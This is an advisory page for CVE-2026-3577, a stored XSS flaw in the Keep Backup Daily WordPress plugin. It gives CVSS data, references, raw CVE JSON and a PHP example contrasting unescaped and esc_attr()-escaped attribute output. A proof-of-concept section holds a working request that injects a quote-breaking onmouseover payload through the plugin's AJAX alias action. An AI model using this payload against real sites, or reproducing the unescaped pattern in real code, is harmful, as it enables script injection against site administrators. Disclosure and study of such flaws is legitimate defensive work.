Security Vulnerability Report
CVE-2026-3577 CVSS 4.4 MEDIUM

Published: 2026-03-21 00:16:29
Last Modified: 2026-04-22 21:32:08

Description

The Keep Backup Daily plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the backup title alias (`val` parameter) in the `update_kbd_bkup_alias` AJAX action in all versions up to, and including, 2.1.2. This is due to insufficient input sanitization and output escaping. While `sanitize_text_field()` strips HTML tags on save, it does not encode double quotes. The backup titles are output in HTML attribute contexts without `esc_attr()`. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts via attribute injection that will execute whenever another administrator views the backup list page.
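To show why stripping tags on save is not enough once a value is echoed inside a quoted HTML attribute, here is an added example (not the plugin's own code) of the vulnerable output pattern beside the hardened form that uses `esc_attr()` at the point of output. It assumes a minimal stand-in for WordPress's `esc_attr()` and `sanitize_text_field()` so the file runs outside WordPress; the sample alias is constructed.

```php
<?php
// Added example, not Keep Backup Daily's code.
// Stand-in for WordPress's esc_attr() so this runs outside WordPress
// (assumption: htmlspecialchars() with ENT_QUOTES is close enough here;
// the real esc_attr() also avoids double-encoding existing entities).
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Stand-in for the save-side behaviour the advisory describes: tags are
// stripped, but double quotes survive untouched (assumption; the real
// sanitize_text_field() also normalises whitespace and invalid bytes).
function save_alias($val) {
    return trim(strip_tags((string) $val));
}

// Vulnerable pattern: the stored alias lands inside a quoted attribute
// with no attribute-context escaping, so a quote in the value ends the
// attribute early.
function render_alias_vulnerable($alias) {
    return '<input type="text" name="alias" value="' . $alias . '">';
}

// Hardened pattern: esc_attr() encodes quotes at output time, so the
// value can never terminate the attribute regardless of what was saved.
function render_alias_hardened($alias) {
    return '<input type="text" name="alias" value="' . esc_attr($alias) . '">';
}

// Constructed sample: a benign title that merely contains double quotes.
$stored = save_alias('Nightly "full" <b>backup</b>');

echo "Stored alias:   $stored\n";                               // Nightly "full" backup
echo "Vulnerable out: " . render_alias_vulnerable($stored) . "\n"; // attribute closed after Nightly
echo "Hardened out:   " . render_alias_hardened($stored) . "\n";   // quotes become &quot;
```

Run it with `php example.php`; the vulnerable line shows the attribute boundary broken by a plain quote, which is exactly the gap between tag stripping and attribute encoding that the advisory describes.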

CVSS Details

CVSS Score: 4.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

Keep Backup Daily <= 2.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC for CVE-2026-3577 Stored XSS -->
<!-- Preconditions: Attacker must have Administrator privileges -->
<html>
<body>
<script>
function exploit() {
  // Payload to inject XSS via HTML attribute context
  // Using double quote to break out of the attribute value
  var xss_payload = '" onmouseover="alert(\'CVE-2026-3577_PoC\')" ';

  // Target endpoint for the vulnerable AJAX action
  var target_url = '/wp-admin/admin-ajax.php';

  // Parameters required for the request
  var params = 'action=update_kbd_bkup_alias&val=' + encodeURIComponent(xss_payload);

  var xhr = new XMLHttpRequest();
  xhr.open('POST', target_url, true);
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xhr.onreadystatechange = function() {
    if (xhr.readyState === 4 && xhr.status === 200) {
      console.log('Payload injected successfully. Check the backup list page.');
    }
  };
  xhr.send(params);
}

// Execute the exploit
exploit();
</script>
</body>
</html>

References

Weakness: CWE-79

https://plugins.trac.wordpress.org/browser/keep-backup-daily/tags/2.1.1/inc/functions.php#L626
https://plugins.trac.wordpress.org/browser/keep-backup-daily/tags/2.1.1/inc/kbd_cron.php#L505
https://plugins.trac.wordpress.org/browser/keep-backup-daily/trunk/inc/functions.php#L626
https://plugins.trac.wordpress.org/browser/keep-backup-daily/trunk/inc/kbd_cron.php#L505
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3481587%40keep-backup-daily&new=3481587%40keep-backup-daily&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/18a4fa4b-5c99-4347-8b34-e49f7e0972be?source=cve
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-3577",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-21T00:16:28.917",
    "lastModified": "2026-04-22T21:32:08.360",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Keep Backup Daily plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the backup title alias (`val` parameter) in the `update_kbd_bkup_alias` AJAX action in all versions up to, and including, 2.1.2. This is due to insufficient input sanitization and output escaping. While `sanitize_text_field()` strips HTML tags on save, it does not encode double quotes. The backup titles are output in HTML attribute contexts without `esc_attr()`. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts via attribute injection that will execute whenever another administrator views the backup list page."
      },
      {
        "lang": "es",
        "value": "El plugin Keep Backup Daily para WordPress es vulnerable a Cross-Site Scripting Almacenado a través del alias del título de la copia de seguridad (parámetro 'val') en la acción AJAX 'update_kbd_bkup_alias' en todas las versiones hasta la 2.1.2, inclusive. Esto se debe a una sanitización de entrada y un escape de salida insuficientes. Aunque 'sanitize_text_field()' elimina las etiquetas HTML al guardar, no codifica las comillas dobles. Los títulos de las copias de seguridad se muestran en contextos de atributos HTML sin 'esc_attr()'. Esto hace posible que atacantes autenticados, con acceso de nivel de Administrador y superior, inyecten scripts web arbitrarios a través de la inyección de atributos que se ejecutarán cada vez que otro administrador vea la página de la lista de copias de seguridad."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 4.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/keep-backup-daily/tags/2.1.1/inc/functions.php#L626", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/keep-backup-daily/tags/2.1.1/inc/kbd_cron.php#L505", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/keep-backup-daily/trunk/inc/functions.php#L626", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/keep-backup-daily/trunk/inc/kbd_cron.php#L505", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3481587%40keep-backup-daily&new=3481587%40keep-backup-daily&sfp_email=&sfph_mail=", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/18a4fa4b-5c99-4347-8b34-e49f7e0972be?source=cve", "source": "[email protected]"}
    ]
  }
}